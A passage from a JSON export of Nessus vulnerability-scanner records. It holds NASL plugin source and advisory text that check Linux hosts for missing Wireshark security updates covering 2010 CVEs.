script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/03\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^13([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 13.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC13\", reference:\"wireshark-1.2.14-1.fc13\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:57:54", "description": "Multiple buffer overflow flaws were found in the Wireshark SigComp Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nNOTE: This errata updates Wireshark to version 1.0.15 to resolve these issues.\n\nAll running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2012-08-01T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : wireshark on SL3.x, SL4.x, SL5.x i386/x86_64", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2995"], "modified": "2021-01-14T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20100811_WIRESHARK_ON_SL3_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60836", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60836);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2995\");\n\n script_name(english:\"Scientific Linux Security Update : wireshark on SL3.x, SL4.x, SL5.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple buffer overflow flaws were found in the Wireshark SigComp\nUniversal Decompressor Virtual Machine (UDVM) dissector. If Wireshark\nread a malformed packet off a network or opened a malicious dump file,\nit could crash or, possibly, execute arbitrary code as the user\nrunning Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2010-1455,\nCVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nNOTE: This errata updates Wireshark to version 1.0.15 to resolve these\nissues.\n\nAll running instances of Wireshark must be restarted for the update to\ntake effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1008&L=scientific-linux-errata&T=0&P=1172\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6cee74b9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark and / or wireshark-gnome packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL3\", reference:\"wireshark-1.0.15-EL3.1\")) flag++;\nif (rpm_check(release:\"SL3\", reference:\"wireshark-gnome-1.0.15-EL3.1\")) flag++;\n\nif (rpm_check(release:\"SL4\", reference:\"wireshark-1.0.15-1.el4_8.1\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"wireshark-gnome-1.0.15-1.el4_8.1\")) flag++;\n\nif (rpm_check(release:\"SL5\", reference:\"wireshark-1.0.15-1.el5_5.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"wireshark-gnome-1.0.15-1.el5_5.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:03:34", "description": "This advisory updates wireshark to the latest version(s), fixing several security issues :\n\nThe SMB dissector in Wireshark 0.99.6 through 1.0.13, and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (NULL pointer dereference) via unknown vectors (CVE-2010-2283).\n\nBuffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors (CVE-2010-2284).\n\nThe SMB PIPE dissector in Wireshark 0.8.20 through 1.0.13 and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (NULL pointer dereference) via unknown vectors (CVE-2010-2285).\n\nThe SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8 allows remote attackers to cause a denial of service (infinite loop) via unknown vectors (CVE-2010-2286).\n\nBuffer overflow in the SigComp Universal Decompressor Virtual Machine dissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote attack vectors (CVE-2010-2287).", "cvss3": {"score": null, "vector": null}, "published": "2010-07-30T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : wireshark (MDVSA-2010:113)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2994"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:dumpcap", "p-cpe:/a:mandriva:linux:lib64wireshark-devel", "p-cpe:/a:mandriva:linux:lib64wireshark0", "p-cpe:/a:mandriva:linux:libwireshark-devel", "p-cpe:/a:mandriva:linux:libwireshark0", "p-cpe:/a:mandriva:linux:rawshark", "p-cpe:/a:mandriva:linux:tshark", "p-cpe:/a:mandriva:linux:wireshark", "p-cpe:/a:mandriva:linux:wireshark-tools", "cpe:/o:mandriva:linux:2009.1", "cpe:/o:mandriva:linux:2010.0"], "id": "MANDRIVA_MDVSA-2010-113.NASL", "href": "https://www.tenable.com/plugins/nessus/48186", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2010:113. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48186);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2285\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2994\");\n script_bugtraq_id(40728);\n script_xref(name:\"MDVSA\", value:\"2010:113\");\n\n script_name(english:\"Mandriva Linux Security Advisory : wireshark (MDVSA-2010:113)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This advisory updates wireshark to the latest version(s), fixing\nseveral security issues :\n\nThe SMB dissector in Wireshark 0.99.6 through 1.0.13, and 1.2.0\nthrough 1.2.8 allows remote attackers to cause a denial of service\n(NULL pointer dereference) via unknown vectors (CVE-2010-2283).\n\nBuffer overflow in the ASN.1 BER dissector in Wireshark 0.10.13\nthrough 1.0.13 and 1.2.0 through 1.2.8 has unknown impact and remote\nattack vectors (CVE-2010-2284).\n\nThe SMB PIPE dissector in Wireshark 0.8.20 through 1.0.13 and 1.2.0\nthrough 1.2.8 allows remote attackers to cause a denial of service\n(NULL pointer dereference) via unknown vectors (CVE-2010-2285).\n\nThe SigComp Universal Decompressor Virtual Machine dissector in\nWireshark 0.10.7 through 1.0.13 and 1.2.0 through 1.2.8 allows remote\nattackers to cause a denial of service (infinite loop) via unknown\nvectors (CVE-2010-2286).\n\nBuffer overflow in the SigComp Universal Decompressor Virtual Machine\ndissector in Wireshark 0.10.8 through 1.0.13 and 1.2.0 through 1.2.8\nhas unknown impact and remote attack vectors (CVE-2010-2287).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/security/wnpa-sec-2010-05.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.wireshark.org/security/wnpa-sec-2010-06.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:dumpcap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64wireshark0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwireshark-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libwireshark0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:rawshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:tshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:wireshark-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2009.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/07/30\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2009.1\", reference:\"dumpcap-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"x86_64\", reference:\"lib64wireshark0-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libwireshark-devel-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", cpu:\"i386\", reference:\"libwireshark0-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"rawshark-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"tshark-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"wireshark-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.1\", reference:\"wireshark-tools-1.0.14-0.1mdv2009.1\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2010.0\", reference:\"dumpcap-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64wireshark-devel-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"x86_64\", reference:\"lib64wireshark0-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libwireshark-devel-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", cpu:\"i386\", reference:\"libwireshark0-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"rawshark-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"tshark-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"wireshark-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.0\", reference:\"wireshark-tools-1.2.9-0.1mdv2010.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T13:03:10", "description": "Updated wireshark packages that fix several security issues are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was previously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file. (CVE-2010-1455, CVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which contain Wireshark version 1.0.15, and resolve these issues. All running instances of Wireshark must be restarted for the update to take effect.", "cvss3": {"score": null, "vector": null}, "published": "2010-08-12T00:00:00", "type": "nessus", "title": "RHEL 3 / 4 / 5 : wireshark (RHSA-2010:0625)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1455", "CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2994", "CVE-2010-2995"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:wireshark", "p-cpe:/a:redhat:enterprise_linux:wireshark-gnome", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:4.8", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2010-0625.NASL", "href": "https://www.tenable.com/plugins/nessus/48314", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0625. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48314);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2010-1455\", \"CVE-2010-2283\", \"CVE-2010-2284\", \"CVE-2010-2286\", \"CVE-2010-2287\", \"CVE-2010-2994\", \"CVE-2010-2995\");\n script_bugtraq_id(39950, 40728);\n script_xref(name:\"RHSA\", value:\"2010:0625\");\n\n script_name(english:\"RHEL 3 / 4 / 5 : wireshark (RHSA-2010:0625)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated wireshark packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3, 4, and 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was\npreviously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp\nUniversal Decompressor Virtual Machine (UDVM) dissector. If Wireshark\nread a malformed packet off a network or opened a malicious dump file,\nit could crash or, possibly, execute arbitrary code as the user\nrunning Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark\ncould crash or stop responding if it read a malformed packet off a\nnetwork, or opened a malicious dump file. (CVE-2010-1455,\nCVE-2010-2283, CVE-2010-2284, CVE-2010-2286)\n\nUsers of Wireshark should upgrade to these updated packages, which\ncontain Wireshark version 1.0.15, and resolve these issues. All\nrunning instances of Wireshark must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-1455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2283\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2284\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2287\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2010-2995\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-03.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-03.html\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-05.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-05.html\"\n );\n # http://www.wireshark.org/security/wnpa-sec-2010-07.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.wireshark.org/security/wnpa-sec-2010-07.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2010:0625\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected wireshark and / or wireshark-gnome packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:wireshark-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0625\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"wireshark-1.0.15-EL3.1\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"wireshark-gnome-1.0.15-EL3.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"wireshark-1.0.15-1.el4_8.1\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"wireshark-gnome-1.0.15-1.el4_8.1\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"wireshark-1.0.15-1.el5_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"wireshark-1.0.15-1.el5_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"wireshark-1.0.15-1.el5_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"wireshark-gnome-1.0.15-1.el5_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"wireshark-gnome-1.0.15-1.el5_5.1\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"wireshark-gnome-1.0.15-1.el5_5.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"wireshark / wireshark-gnome\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T12:54:31", "description": "From Red Hat Security Advisory 2010:0625 :\n\nUpdated wireshark packages that fix several security issues are now available for Red Hat Enterprise Linux 3, 4, and 5.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nWireshark is a program for monitoring network traffic. Wireshark was previously known as Ethereal.\n\nMultiple buffer overflow flaws were found in the Wireshark SigComp Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark. (CVE-2010-2287, CVE-2010-2995)\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding 